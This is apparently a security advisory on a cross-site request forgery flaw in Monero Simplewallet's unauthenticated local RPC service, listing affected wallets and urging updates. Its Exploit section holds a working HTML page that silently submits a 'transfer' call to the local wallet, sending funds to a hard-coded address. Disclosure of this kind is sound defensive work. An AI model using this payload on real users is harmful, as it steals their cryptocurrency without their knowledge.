Description:

Monero is a private, untraceable crypto currency. In recent weeks it  has gained a lot of publicity and has risen in value significantly. It  is the second most traded crypto currency this month after Bitcoin.
A Cross Site Request Forgery vulnerability was discovered in  Monero Simplewallet that could give attackers the ability to remotely  steal Monero from users running vulnerable wallets. Monero users must  take action and update wallets to protect themselves against this  attack. 

Vulnerable Wallets:

The following wallets use Simplewallet in RPC mode and therefore are vulnerable to this attack: 

• Monero SimpleWallet - https://github.com/monero-project/monero
• Monero Lightwallet - https://github.com/jwinterm/LightWallet2/
• Monero Wallet Chrome - https://chrome.google.com/webstore/detail/monero-wallet-for-google/bddoeeocbnbkdlciahimmaciiiiadocb  
• Monero GUI Client.net - https://github.com/kripod/MoneroGui.Net
• Monero JS - https://github.com/netmonk/moneronjs
• Monero NodeJS - https://github.com/PsychicCat/monero-nodejs
• Monero QT - https://github.com/Neozaru/bitmonero-qt
• Minonodo - https://github.com/ShenNoether/MiniNodo

*Note: This is not an exhaustive list, it is likely that more wallets will be affected by this issue. 

Impact:

An attacker could exploit this vulnerability to steal Monero from  vulnerable wallets. This would involve a minimal amount of social  engineering for attackers to direct users to a webpage hosting the  exploit. 

Cause:

Monero SimpleWallet hosts an RPC web service on localhost, port  18082, the web service requires no authentication to initiate functions  such as making payments, and can be compromised through a Cross Site  Request Forgery attack. Cross Site Request Forgery is an attack that forces a user’s browser  to execute unwanted actions against web applications or web services  they are authenticated with. In this case, by directing a user to a  malicious web page, an attacker could make a payment from the user's  wallet to their own wallet. Third party wallets were found to use  Simplewallet in RPC mode, making the majority of third party wallets  vulnerable to this attack too. 

Exploit:

The below script performs a Cross Site Request Forgery (CSRF) attack  that would automatically steal Monero from the wallet of any user who  visited the webpage. 

 

<html>  
    <form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay" >  
        <input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'>  
    </form>  
    <script>
         document.pay.submit()
    </script>
</html>  

 

Remedial Action:

The vendor has released a hotfix for this vulnerability. it is  important Monero users update their versions of Monero immediately.  Users of third party offline wallets are unlikely to have a patch  available yet, therefore it is recommended that users transfer their  funds out of third party wallets into a secure wallet, such as the  updated version of Simplewallet (https://github.com/monero-project/monero/releases/tag/v0.10.0).